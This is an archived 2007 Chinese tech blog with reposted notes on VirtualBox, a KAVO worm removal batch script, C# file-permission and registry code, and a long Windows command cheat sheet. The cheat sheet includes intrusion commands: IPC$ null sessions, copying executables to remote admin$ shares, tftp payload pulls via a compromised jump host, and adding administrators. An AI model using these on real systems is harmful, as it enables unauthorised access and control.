2007年12月18日 星期二

安裝好用的虛擬機器 VirtualBox

參考源 : http://mr-cat-liolee.blogspot.com/2007/06/virtualbox.html

1. 讓虛擬機器透過Bridge的方式進行連線,這樣的話就可以讓真實機器與虛擬機器處在同一層網域中,缺點是虛擬機器將會直接暴露在網路上,會有安全性的問題!

2. 安裝Additions工具,利用本身的功能將資料夾分享出來,優點是可以保持真實機器與虛擬機器的獨立性,缺點是仍然無法直接連線虛擬機器,如果要測試的功能常常會需要用到網路連線就不適用......

一方面可以保持連線,一方面又可以直接交換檔案,實際作法如下:
......................

2007年12月17日 星期一

遠端開關機設定

遠端開關機設定
連結網址 : http://members.lycos.co.uk/ntou/

KAVO的說明及快速解法

轉貼自: 「怪貓」的部落格
http://tw.myblog.yahoo.com/jw!ljyxR6.BFU.mrG8YGw--/article?mid=107&sc=1

的說明及快速解法(也可以解決C、D、E、F槽不能開的問題)
分類:資訊安全
2007/08/31 09:55
KAVO.病毒說

它會在你的所有磁碟機中的根目錄中產生4個檔案
c:\「autorun.inf(自動執行檔) 及 ntdelect.com(kavo病毒)」
這2個檔案的功能是一直複製自己到別的磁碟中,只要是磁碟裝置就會被變成傳染媒介。

c:\windows\system32\「kavo.exe 及 kavo0.dll」
這2個檔案的功能是將你的檢視隱藏檔的功能給鎖起來。(也就是無法檢視隱藏檔)
另一個動作是,將病毒檔複製到→接上電腦的磁碟裝置(如隨身碟)

▲檢查方法:在左下角按「開始」→「執行」→輸入「磁碟機代碼:\autorun.inf」按下確定,有開出記事本就要注意了!
open=ntdelect.com (在open後面就是病毒檔名,也就是一開始要執行的檔案)

★:千萬要小心不要刪到系統碟底下的「ntdetect.com」刪到之後將會不能開機,這隻病毒故意取這個名字只有差一個字所以要小心(已經有好幾個人刪錯檔了!)。
ntdelect.com 這才是病毒檔;ntdetect.com 這是系統開機會用到的檔案
(刪錯的話請將硬碟拆到別台電腦再把這個檔案拷回來吧)

------------------------------------- 2007/11/05開放下載-------------------------------------
這是給XP用的解法:
快速解法下載:
載點:「http://www.zshare.net/download/4730003dd50c4b/」 「http://www.zshare.net/download/566658227053cb/」(12/16更新)★:第一次點進去會開廣告出來,之後再點一次就可以下載了(畢竟他們也是要生存的)。
解壓縮後照裡面的說明操作就完成解毒及修復所有的問題了!『快速又有效』
------------------------------------- 2007/11/05開放下載-------------------------------------

■:最後將你的防毒軟體的病毒碼更新到最新,再做一次全系統的掃瞄,會更完整。

★注意:你的隨身碟現可能是這隻病毒的傳染媒體,請參考下面的安全的操作方法來使用「隨身碟、數位相機、手機、記憶卡」(只要會在電腦產生一個磁碟代號的裝置都可能會中kavo)
隨身碟病毒的處理可以參考針對目前木馬病毒預防措施!

手動製作「解除kavo檔」:
請將「分隔線」中的資資、複製起來貼到「記事本」另存新檔,存成「del-kavo.bat」的檔案就好了。
如系統是 Win2K或是XP是家用版的話請用「工作管理員」先將「explorer.exe」給結束工作後再執行「del-kavo.bat」就完成解毒了。
---------------------------分隔線---------------------------@echo off
echo 開始解除kavo木馬病毒,請按下任意鍵...
pause >nul 2>nul
@set A=C D E F G H I J K L M N O P Q R S T U V W X Y Z
@set T=這個資料夾是用來防病毒的,所以故意取跟病毒的檔名一樣,這樣就能防止病毒寫入!「請勿刪除!」,近期發現部份軟體會將「AutoRun.inf」的資料夾給刪除掉,請隨時注意這個資料夾是否存在。 怪貓...
start /wait taskkill /f /im explorer.exe
cls
echo.
rem 刪除登錄檔中KAVO病毒的起動值
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "kava" /f >nul 2>nul
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "tasa" /f >nul 2>nul
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "mnsa" /f >nul 2>nul
echo.
rem 刪除個磁碟中的autorun.inf及ntdelect.com的病毒檔,並建立同名的資料夾,用以防止病毒寫入,屬性改成「唯讀、隱藏、系統」
for %%x in (%A%) do (
@if exist %%x:\autorun.inf attrib -r -s -h -a %%x:\autorun.inf >nul 2>nul
@del %%x:\autorun.inf /q /f >nul 2>nul
@if exist %%x:\ntdelect.com attrib -r -s -h -a %%x:\ntdelect.com >nul 2>nul
@del %%x:\ntdelect.com /q /f >nul 2>nul
@if exist %%x:\ntdeIect.com attrib -r -s -h -a %%x:\ntdeIect.com >nul 2>nul
@del %%x:\ntdeIect.com /q /f >nul 2>nul
@if not exist %%x:\AUTORUN.INF md %%x:\AUTORUN.INF >nul 2>nul
@attrib +r +s +h %%x:\AUTORUN.INF >nul 2>nul
@if not exist %%x:\NTDELECT.COM md %%x:\NTDELECT.COM >nul 2>nul
@attrib +r +s +h %%x:\NTDELECT.COM >nul 2>nul
@if not exist %%x:\NTDEIECT.COM md %%x:\NTDEIECT.COM >nul 2>nul
@attrib +r +s +h %%x:\NTDEIECT.COM >nul 2>nul
@echo %T%> %%x:\AUTORUN.INF\README.TXT
@echo %T% > %%x:\NTDELECT.COM\README.TXT & cls
@echo %T% > %%x:\NTDEIECT.COM\README.TXT & cls)
rem 病毒感染用的檔案刪除完成
echo.
rem 將被鎖定的隱藏檢視功能開啟(登錄檔)
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v "CheckedValue" /t REG_DWORD /d 00000001 /f >nul 2>nul
rem 已修復無法開啟檢視隱藏檔的功能,有需要請到資料夾中的資料夾選項去開啟檢視隱藏的功能,不需要就別開
cls
echo.
rem 刪除kavo的病毒主程式
attrib -s -h -r "%windir%\system32\kav*.*" >nul 2>nul&echo.&echo.& del "%windir%\system32\kav*.*" >nul 2>nul
echo.
@for %%z in (KAVO.EXE KAVO0.DLL KAVO1.DLL KAVO2.DLL) do (if not exist "%windir%\system32\%%z" md "%windir%\system32\%%z" >nul 2>nul
attrib +s +h +r "%windir%\system32\%%z"
echo %T% > "%windir%\system32\%%z\README.TXT")
@cls
echo 刪除完成,kavo的病毒已成功解除,各磁碟的根目錄下會有autorun.inf的資料夾那是用來保護的!
echo.
echo 解毒完成,請將此畫面『關閉』後就可正常使用了,不過還是建議重開機會比較好。
echo 可以的話請將防毒軟體的病毒碼更新後再做一次全系統的病毒掃瞄,會更好只是會浪費很多時間。
call explorer.exe---------------------------分隔線---------------------------

更新說明:
9/4 把之前寫錯的nddelect.com改正為ntdelect.dll
9/5 增加建立KAVO0.DLL、KAVO1.DLL的資料夾
9/6 增加建立KAVO.EXE、NTDELECT.COM的資料夾
9/8 改用IF判斷,正確率提高不少,不過少部份電腦會停住不動(關閉再執行一次就好了)
9/29 修改成只要執行一個檔案就好了,順便解決大家常見的問題(內有說明),省下重開機的時間
10/13 拿別人的電腦來測試同學寄給我的病毒,發現到這隻病毒的母木馬會存在「c:\windows\debug\」裡面,檔案為「.dll 和 .exe」,不定時會生出「ubs.exe」
10/15 新發現! 「ubs.exe」就是kavo病毒
ubs.exe 的來源是從信件中來的「如:開啟夾帶的執行檔後會開一張美女圖」你就被值入母木馬了(防毒軟體掃不到),接下來就會不定時產生ubs.exe 及 ubs[1].exe 。
解毒方法我還再整體(編寫解毒檔中),現在又確定了kavo的病毒主要的目地就是竊取線上遊戲的帳密。
11/05 找到網路空間,已開放下載(原則上我窵的東西全放在裡面,內有說明檔,請先看說明再決定要用那一個檔案)。
11/23 把多於的指令給拿掉了,本來想說多做幾個預防的動作,就是順便解其他的病毒,後來想清楚後,其他解毒檔另外寫就好了,實在是沒比要寫在一起。
12/16 發現病毒變種了,檔名改為「ntdeIect.com」,在批次檔的部份增加了清除的指令。
以上是我的解法,轉貼請注明出處!
畢竟是花了很多時間一邊測試一邊寫出來的檔案,而且批次檔已經很少人再用了,批次檔的好處就是動作透明,不放心的人可用記事本就可以開出來編輯檢視裡面的動作是否安全。
(有極少數人不敢執行! 呵呵~ 要怕的話應該是要怕 *.COM 及 *.EXE之類的檔案吧?)
96/12/16 怪貓

2007年12月9日 星期日

推薦C#記錄log的工具

轉載自 : http://www.cs-open.com/sort/13.html

日誌資訊輸出到各種不同目標的.net類庫。它可以容易的載入到開發專案中,實現程式調試和運行的時候的日誌資訊輸出,提供了比.net自己提供的debug類和trace類的功能更多。log4net是從java下有卓越表現的log4j移植過來的。它是apache基金資助的專案的一部分。
NLog 更新時間(2006-8-2)
NLog是C#編寫的開源日誌類庫 ,它的設計思想是使其簡單而靈活。NLog讓你處理診斷的日誌消息,用相關資訊擴充消息,依照你的選擇格式化日誌消息和把日誌消息輸出到一個或多個目的地。
LogThis 更新時間(2006-8-2)
LogThis是為.NET應用程式提供的一款C#開源日誌框架,它可以嵌入到應用程式之中。
AppLog 更新時間(2006-6-15)
AppLog是一個簡單的應用日誌工具。它使用C#開發,且使用ByteFX MySQL 資料訪問庫.。
C# .NET LOGGER 更新時間(2006-6-15)
C#開發的可擴展日誌工具,有高級消息佇列支援,可以非同步使用。
CSharp Logger 更新時間(2006-6-15)
CSharp Logger是apache繼log4net專案後設計的又一個日誌工具。它用來向Windows的事件日誌寫入debug、info、warn和error四個等級的資訊。

c#搜尋關鍵詞 與 xml (temp=====)

1. DirectorySecurity c# 群組
2. c# 檔案權限
3.
4.
5.


xml 新雲網路網路學院.NET專區XML 相關 → 文章列表
1. http://www.newasp.net/tech/net/techlist_322_2.html
2.C#對XML操作:寫入一筆XML記錄(1)
3.C#對XML操作:寫入一筆XML記錄(2)

Visual C#»目錄&子目錄權限

參考網址 :
http://forums.microsoft.com/MSDN-CHT/ShowPost.aspx?PostID=524250&SiteID=14

您可以透過以下的程式碼設定目錄的存取權限:
FileSecurity fSecurity = File.GetAccessControl("C:/Temp");
fSecurity.AddAccessRule(new FileSystemAccessRule(@"Domain\帳號", FileSystemRights.Read, AccessControlType.Allow));
File.SetAccessControl("C:/Temp", fSecurity);


要套用到子目錄和檔案, 必須使用DirectorySecurityAccessRule類別:
DirectoryInfo di = new DirectoryInfo(Path);
DirectorySecurity ds = di.GetAccessControl();

FileSystemAccessRule ar1 = new FileSystemAccessRule(Account, FileSystemRights.Read, AccessControlType.Allow);

FileSystemAccessRule ar2 = new FileSystemAccessRule(Account, FileSystemRights.Read, InheritanceFlags.ContainerInherit InheritanceFlags.ObjectInherit, PropagationFlags.InheritOnly, AccessControlType.Allow);

ds.AddAccessRule(ar1);
ds.AddAccessRule(ar2);
di.SetAccessControl(ds);

如何用C#創建、刪除、並且可以對檔夾的屬性(如:可讀、可寫等)設定?

轉貼自: http://topic.csdn.net/u/20070112/17/da78451a-bcb0-4852-ae3b-5c4e21e190a7.html
===================
//!System.IO.Directory.Exists(p)該方法先判斷是否存在該檔夾,其中P是該檔夾的路徑
//使用之前要聲名並賦值,如:string p=@ "d:\我的文件夾 ";
if (!System.IO.Directory.Exists(p))
//執行以下這條語句,就可以創建該檔夾了
System.IO.Directory.CreateDirectory(p);

==============
using System.IO;
string p=@ "d:\我的文件夾 ";
Directory.CreateDirectory(p);//創建
Directory.Delete(p);//刪除

================
//using System.IO;
if(Directory.GetFiles(tmppath).Length==0)
{
//創建目錄
Directory.CreateDirectory(tmppath);
//刪除臨時目錄
Directory.Delete(tmppath,true);
//刪除暫存檔案
File.Delete(filename);
}

2007年12月8日 星期六

.NET 2.0 的應用程式設定

pure C# 技術社群
參考網址:http://www.purecs.net/thread/topic521_1.aspx

請問如何透過自己寫的程式去 設定資料夾的共用 包刮他的的使用者權限

參考網址:http://forums.microsoft.com/MSDN-CHT/ShowPost.aspx?PostID=722983&SiteID=14

System.directoryServices這個Namespace是給AD操作用的,並不是指資料庫的權限。
請您參考以下網址,裡面也有提供您簡單的Sample Code可以測試:
http://msdn2.microsoft.com/en-US/library/system.io.directoryinfo.setaccesscontrol.aspx
主要要用到兩個Namespace:
System.IO
System.Security.AccessControl

HOW TO:設定 EventLog 元件執行個體

HOW TO:設定 EventLog 元件執行個體
參考網頁: http://msdn2.microsoft.com/zh-tw/library/w3t54f67(VS.80).aspx

如何儲存和藉由使用 Visual C# 中從應用程式組態檔擷取自訂資訊

如何儲存和藉由使用 Visual C# 中從應用程式組態檔擷取自訂資訊
參考網頁: http://support.microsoft.com/kb/815786/zh-tw

FTP 使用 Visual C# 中使用 Active Directory 使用者隔絕

連結: http://support.microsoft.com/kb/555205/zh-tw

如何管理事件記錄檔使用 Visual C# . NET 或 Visual C# 2005

連結 : http://support.microsoft.com/kb/815314/zh-tw

如何:使用 Visual C# .NET 從檔案讀取 XML

來源http://support.microsoft.com/kb/307548/zh-tw

用Cacls.exe修改檔案訪問許可權

轉貼自 : 香港IT網 / 作業系統 / 經驗技巧 / http://www.hkitn.com/article.php/5914
用Cacls.exe修改檔案訪問許可權
2007-11-01 點選: 172
用Cacls.exe修改檔案訪問許可權
  現在越來越多的用戶使用NTFS檔案系統來增強Windows系統的安全性。通常是在圖形用戶介面(GUI)的“安全”選項卡中對檔案或資料夾訪問控制許可權進行設定。還有一種設定方式大家可能很少使用,這就是Cacls命令。
  雖然它是一個基於命令行的命令,使用起來有點繁瑣,但只要你合理利用,也會在提高系統安全性方面起到很好的效果。Cacls命令使用格式如下:
  Cacls filename [/T] [/E] [/C] [/G user:perm] [/R user [...]] [/P user:perm [...]] [/D user [...]]
  Filename——顯示訪問控制列表(以下簡稱ACL);
  /T——更改當前資料夾及其所有子資料夾中指定檔案的 ACL;
  /E—— 編輯 ACL 而不替換;
  /C——在出現拒絕訪問錯誤時繼續;
  /G user:perm——賦予指定用戶訪問許可權。Perm 可以是R(讀取)、W(寫入)、C(更改,寫入)、F (完全控制);
  /R user——撤銷指定用戶的訪問許可權(僅在與 /E 一起使用);
  /P user:perm——替換指定用戶的訪問許可權;
  /D user——拒絕指定用戶的訪問。

  1.檢視資料夾和ACL
  以Windows XP系統為例,筆者使用Cacls命令檢視E盤CCE資料夾訪問控制許可權。點擊“開始→執行”,在執行對話方塊中輸入“CMD”命令,彈出命令提示符對話方塊,在“E:\>”提示符下輸入“Cacls CCE”命令,接著就會列出Windows XP系統中用戶組和用戶對CCE資料夾的訪問控制許可權專案。如果想檢視CCE資料夾中所有檔案訪問控制許可權,輸入“Cacls cce\ . ”命令即可。
  2.修改資料夾和ACL
  設定用戶訪問許可權:我們經常要修改資料夾和檔案的訪問許可權,使用Cacls命令就很容易做到。下面要賦予本機用戶Chenfeng對E盤下CCE資料夾及其所有子資料夾中的檔案有完全控制許可權。在命令提示符對話方塊中輸入“Cacls CCE /t /e /c /g Chenfeng:f ”命令即可。
  替換用戶訪問許可權:將本機用戶Chenfeng的完全控制許可權替換為唯讀許可權。在命令提示符對話方塊中輸入“ Cacls CCE /t /e /c /p Chenfeng:r ”命令即可。
  撤銷用戶訪問許可權:要想撤銷本機用戶Chenfeng對該資料夾的完全控制許可權也很容易,在命令提示符中執行“Cacls CCE /t /e /c /r Chenfeng ”即可。
  拒絕用戶訪問:要想拒絕用戶Chenfeng訪問CCE資料夾及其所有子資料夾中的檔案,執行“Cacls CCE /t /e /c /d Chenfeng”即可。
  以上只是簡單介紹Cacls命令的使用,建議大家親自嘗試一下,你會發現它還有很多奇妙的功能。

Visual C# . NET 程式碼來修改登錄機碼

Visual C# . NET 程式碼來修改登錄機碼
http://support.microsoft.com/kb/313723/zh-tw

using Microsoft.Win32;
//...............................
public void IESetupFooter()
{
string strKey = "Software\\Microsoft\\Internet Explorer\\PageSetup";
bool bolWritable = true; string strName = "footer";
object oValue = "Test Footer";
RegistryKey oKey = Registry.CurrentUser.OpenSubKey(strKey,bolWritable);
Console.Write (strKey);
oKey.SetValue(strName,oValue);
oKey.Close();
}
請注意 您的應用程式必須要有: 讀取和寫入權

DOS命令大全

轉貼自 asp.net(c#) 学习和应用 http://www.cnblogs.com/fjchenq/archive/2006/10/31/545924.html

DOS命令大全(經典收藏)

net use \\ip\ipc$ " " /user:" " 建立IPC空鏈結
net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈結
net use h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C:到本地為H:
net use h: \\ip\c$ 登陸後映射對方C:到本地為H:
net use \\ip\ipc$ /del 刪除IPC鏈結
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes 啟動guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 用戶名 /add 把"用戶"添加到管理員中使其具有管理員許可權,注意:administrator後加s用複數
net start 查看開啟了哪些服務
net start 服務名  開啟服務;(如:net start telnet, net start schedule)
net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set 設置本地計算機時間與"目標IP"主機的時間同步,加上參數/yes可取消確認資訊
net view 查看本地局域網內開啟了哪些共用
net view \\ip 查看對方局域網內開啟了哪些共用
net config 顯示系統網路設置
net logoff 斷開連接的共用
net pause 服務名 暫停某服務
net send ip "文本資訊" 向對方發資訊
net ver 局域網內正在使用的網路連接類型和資訊
net share 查看本地開啟的共用
net share ipc$ 開啟ipc$共用
net share ipc$ /del 刪除ipc$共用
net share c$ /del 刪除C:共用
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況,常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例:netstat -p tcq/ip 查看某協定使用情況(查看tcp/ip協定使用情況)
netstat -s 查看正在使用的所有協定使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話,就可查看對方最近登陸的用戶名(03前的為用戶名)-注意:參數-A要大寫
tracert -參數 ip(或電腦名) 跟蹤路由(資料包),參數:"-w數位"用於設置超時間隔。
ping ip(或功能變數名稱) 向對方主機發送默認大小為32位元組的資料,參數:"-l[空格]數據包大小";"-n發送資料次數";"-t"指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的檔並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數"/all"顯示全部配置資訊
tlist -t 以樹行列表顯示進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools檔夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools檔夾內)
del -F 檔案名 加-F參數後就可刪除唯讀檔案,/AR、/AH、/AS、/AA分別表示刪除唯讀、隱藏、系統、存檔檔,/A-R、/A-H、/A-S、/A-A表示刪除除唯讀、隱藏、系統、存檔以外的檔。例如"DEL/AR *.*"表示刪除當前目錄下所有唯讀檔案,"DEL/A-S *.*"表示刪除當前目錄下除系統檔以外的所有檔
#2 二:
del /S /Q 目錄 或用:rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和檔。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。(二個命令作用相同)
move 盤符\路徑\要移動的檔案名 存放移動檔的路徑\移動後檔案名 移動檔,用參數/y將取消確認移動目錄存在相同檔的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個檔並把不同之處輸出到3st.txt文件中,"> "和"> >" 是重定向命令
at id號 開啟已註冊的某個計畫任務
at /delete 停止所有計劃任務,用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已註冊的計畫任務
at 查看所有的計畫任務
at \\ip time 程式名(或一個命令) /r 在某時間運行對方某程式並重新啟動電腦
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠 遠和登陸伺服器,默認埠為23
open ip 連接到IP(屬telnet登陸後的命令)
telnet 在本機上直接鍵入telnet 將進入本機的telnet
copy 路徑\檔案名1 路徑\檔案名2 /y 複製檔1到指定的目錄為檔2,用參數/y就同時取消確認你要改寫一份現存目錄檔
copy c:\srv.exe \\ip\admin$ 複製本地c:\srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的檔,注:2st.txt文件頭要空三排,參數:/b指二進位檔,/a指ASCLL格式檔
copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 複製對方admini$共用下的srv.exe檔(所有檔)至本地C:
xcopy 要複製的檔或目錄樹 目標位址\目錄名 複製檔和目錄樹,用參數/Y將不提示覆蓋相同檔
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:\server.exe 登陸後,將"IP"的server.exe下載到目標主機c:\server.exe 參數:-i指以二進位模式傳送,如傳送exe檔時用,如不加-i 則以ASCII模式(傳送文字檔案模式)進行傳送
tftp -i 對方IP put c:\server.exe 登陸後,上傳本地c:\server.exe至主機
ftp ip 埠 用於上傳檔至伺服器或進行檔操作,默認埠為21。bin指用二進位方式傳送(可執行檔進);
默認為ASCII格式傳送(文字檔案時)
route print 顯示出IP路由,將主要顯示網路位址Network addres,子網路遮罩Netmask,閘道位址Gateway addres,介面位址Interface
arp 查看和處理ARP緩存,ARP是名字解析的意思,負責把一個IP解析成一個物理性的MAC位址。arp -a將顯示出全部資訊
start 程式名或命令 /max 或/min 新開一個新視窗並最大化(最小化)運行某程式或命令
mem 查看cpu使用情況
attrib 檔案名(目錄名) 查看某檔(目錄)的屬性
attrib 檔案名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某檔的 存檔,唯讀,系統,隱藏 屬性;用+則是添加為某屬性
dir 查看文件,參數:/Q顯示檔及目錄屬系統哪個用戶,/T:C顯示檔創建時間,/T:A顯示檔上次被訪問時間,/T:W上次被修改時間
date /t 、 time /t 使用此參數即"DATE/T"、"TIME/T"將只顯示當前日期和時間,而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元 設置環境變數
set 顯示當前所有的環境變數
set p(或其他字元) 顯示出當前以字元p(或其他字元)開頭的所有環境變數
pause 暫停批次處理程式,並顯示出:請按任意鍵繼續....
if 在批次處理程式中執行條件處理(更多說明見if命令及變數)
goto 標籤 將cmd.exe導向到批次處理程式中帶標籤的行(標籤必須單獨一行,且以冒號打頭,例如:":start"標籤)
call 路徑\批次檔案名 從批次處理程式中調用另一個批次處理程式 (更多說明見call /?)
for 對一組檔中的每一個檔執行某個特定命令(更多說明見for命令及變數)
echo on或off 打開或關閉echo,僅用echo不加參數則顯示當前echo設置
echo 資訊 在螢幕上顯示出資訊
echo 信息 >> pass.txt 將"資訊"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt檔中尋找字串hello
find 檔案名 查找某檔
title 標題名字 更改CMD窗口標題名字
color 顏色值 設置cmd控制臺前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:\、D:\統一改為:EntSky\ )
#3 三:
ver 在DOS視窗下顯示版本資訊
winver 彈出一個視窗顯示版本資訊(記憶體大小、系統版本、補丁版本、電腦名)
format 盤符 /FS:類型 格式化磁片,類型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目錄名 創建目錄
replace 原始檔案 要替換檔的目錄 替換檔
ren 原檔案名 新檔案名 重命名檔案名
tree 以樹形結構顯示出目錄,用參數-f 將列出第個檔夾中檔案名稱
type 檔案名 顯示文字檔案的內容
more 檔案名 逐屏顯示輸出檔
doskey 要鎖定的命令=字元
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行,重新調用win2k命令,並創建宏)。如:鎖定dir命令:doskey dir=entsky (不能用doskey dir=dir);解鎖:doskey dir=
taskmgr 調出任務管理器
chkdsk /F D: 檢查磁片D並顯示狀態報告;加參數/f並修復磁片上的錯誤
tlntadmn telnt服務admn,鍵入tlntadmn選擇3,再選擇8,就可以更改telnet服務默認埠23為其他任何埠
exit 退出cmd.exe程式或目前,用參數/B則是退出當前批次處理腳本而不是cmd.exe
path 路徑\可執行檔的檔案名 為可執行檔設置一個路徑。
cmd 啟動一個win2K命令解釋視窗。參數:/eff、/en 關閉、開啟命令擴展;更我詳細說明見cmd /?
regedit /s 註冊表檔案名 導入註冊表;參數/S指安靜模式導入,無任何提示;
regedit /e 註冊表檔案名 導出註冊表
cacls 檔案名 參數 顯示或修改檔訪問控制列表(ACL)——針對NTFS格式時。參數:/D 用戶名:設定拒絕某用戶訪問;/P 用戶名:perm 替換指定用戶的訪問許可權;/G 用戶名:perm 賦予指定用戶訪問許可權;Perm 可以是: N 無,R 讀取, W 寫入, C 更改(寫入),F 完全控制;例:cacls D:\test.txt /D pub 設定d:\test.txt拒絕pub用戶訪問。
cacls 檔案名 查看檔的訪問用戶許可權列表
REM 文本內容 在批次檔案中添加注解
netsh 查看或更改本地網路配置情況
#4 四:
IIS服務命令:
iisreset /reboot 重啟win2k電腦(但有提示系統將重啟資訊出現)
iisreset /start或stop 啟動(停止)所有Internet服務
iisreset /restart 停止然後重新啟動所有Internet服務
iisreset /status 顯示所有Internet服務狀態
iisreset /enable或disable 在本地系統上啟用(禁用)Internet服務的重新啟動
iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時,若發生錯誤將重新開機
iisreset /noforce 若無法停止Internet服務,將不會強制終止Internet服務
iisreset /timeout Val在到達逾時間(秒)時,仍未停止Internet服務,若指定/rebootonerror參數,則電腦將會重新開機。預設值為重新啟動20秒,停止60秒,重新開機0秒。
FTP 命令: (後面有詳細說明內容)
ftp的命令行格式為:
ftp -v -d -i -n -g[主機名] -v 顯示遠端伺服器的所有回應資訊。
-d 使用調試方式。
-n 限制ftp的自動登錄,即不使用.netrc文件。
-g 取消全局檔案名。
help [命令] 或 ?[命令] 查看命令說明
bye 或 quit 終止主機FTP進程,並退出FTP管理方式.
pwd 列出當前遠端主機目錄
put 或 send 本地檔案名 [上傳到主機上的檔案名] 將本地一個檔傳送至遠端主機中
get 或 recv [遠端主機檔案名] [下載到本地後的檔案名] 從遠端主機中傳送至本地主機中
mget [remote-files] 從遠端主機接收一批檔至本地主機
mput local-files 將本地主機中一批檔傳送至遠端主機
dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的檔.如果有本地檔,就將結果寫至本地檔
ascii 設定以ASCII方式傳送檔(缺省值)
bin 或 image 設定以二進位方式傳送檔
bell 每完成一次檔傳送,報警提示
cdup 返回上一級目錄
close 中斷與遠端伺服器的ftp會話(與open對應)
open host[port] 建立指定ftp伺服器連接,可指定連接埠
delete 刪除遠端主機中的檔
mdelete [remote-files] 刪除一批檔
mkdir directory-name 在遠端主機中建立目錄
rename [from] [to] 改變遠端主機中的檔案名
rmdir directory-name 刪除遠端主機中的目錄
status 顯示當前FTP的狀態
system 顯示遠端主機系統類型
user user-name [password] [account] 重新以別的用戶名登錄遠端主機
open host [port] 重新建立一個新的連接
prompt 交互提示模式
macdef 定義巨集命令
lcd 改變當前本地主機的工作目錄,如果缺省,就轉到當前用戶的HOME目錄
chmod 改變遠端主機的檔許可權
case 當為ON時,用MGET命令拷貝的檔案名到本地機器中,全部轉換為小寫字母
cd remote-dir 進入遠端主機目錄
cdup 進入遠端主機目錄的父目錄
! 在本地機中執行交互shell,exit回到ftp環境,如!ls*.zip
#5 五:
MYSQL 命令:
mysql -h主機位址 -u用戶名 -p密碼 連接MYSQL;如果剛安裝好MYSQL,超級用戶root是沒有密碼的。
(例:mysql -h110.110.110.110 -Uroot -P123456
注:u與root可以不用加空格,其他也一樣)
exit 退出MYSQL
mysqladmin -u用戶名 -p舊密碼 password 新密碼 修改密碼
grant select on 資料庫.* to 用戶名@登錄主機 identified by \"密碼\"; 增加新用戶。(注意:和上面不同,下面的因為是MYSQL環境中的命令,所以後面都帶一個分號作為命令結束符)
show databases; 顯示資料庫列表。剛開始時才兩個資料庫:mysql和test。mysql庫很重要它裏面有MYSQL的系統資訊,我們改密碼和新增用戶,實際上就是用這個庫進行操作。
use mysql;
show tables; 顯示庫中的資料表
describe 表名; 顯示資料表的結構
create database 庫名; 建庫
use 庫名;
create table 表名 (欄位設定列表); 建表
drop database 庫名;
drop table 表名; 刪庫和刪表
delete from 表名; 將表中記錄清空
select * from 表名; 顯示表中的記錄
mysqldump --opt school>school.bbb 備份資料庫:(命令在DOS的\\mysql\\bin目錄下執行);注釋:將資料庫school備份到school.bbb文件,school.bbb是一個文字檔案,檔案名任取,打開看看你會有新發現。
win2003系統下新增命令(實用部份):
shutdown /參數 關閉或重啟本地或遠端主機。
參數說明:/S 關閉主機,/R 重啟主機, /T 數位 設定延時的時間,範圍0~180秒之間, /A取消開機,/M //IP 指定的遠端主機。
例:shutdown /r /t 0 立即重啟本地主機(無延時)
taskill /參數 進程名或進程的pid 終止一個或多個任務和進程。
參數說明:/PID 要終止進程的pid,可用tasklist命令獲得各進程的pid,/IM 要終止的進程的進程名,/F 強制終止進程,/T 終止指定的進程及他所啟動的子進程。
tasklist 顯示當前運行在本地和遠端主機上的進程、服務、服務各進程的進程識別字(PID)。
參數說明:/M 列出當前進程載入的dll檔,/SVC 顯示出每個進程對應的服務,無參數時就只列出當前的進程。
#6 六:
Linux系統下基本命令: 要區分大小寫
uname 顯示版本資訊(同win2K的 ver)
dir 顯示當前目錄檔,ls -al 顯示包括隱藏檔(同win2K的 dir)
pwd 查詢當前所在的目錄位置
cd cd ..回到上一層目錄,注意cd 與..之間有空格。cd /返回到根目錄。
cat 檔案名 查看檔內容
cat >abc.txt 往abc.txt檔中寫上內容。
more 檔案名 以一頁一頁的方式顯示一個文字檔案。
cp 複製檔
mv 移動文件
rm 檔案名 刪除檔,rm -a 目錄名刪除目錄及子目錄
mkdir 目錄名 建立目錄
rmdir 刪除子目錄,目錄內沒有文檔。
chmod 設定檔案或目錄的存取許可權
grep 在檔案中查找字串
diff 檔案檔比較
find 檔案搜尋
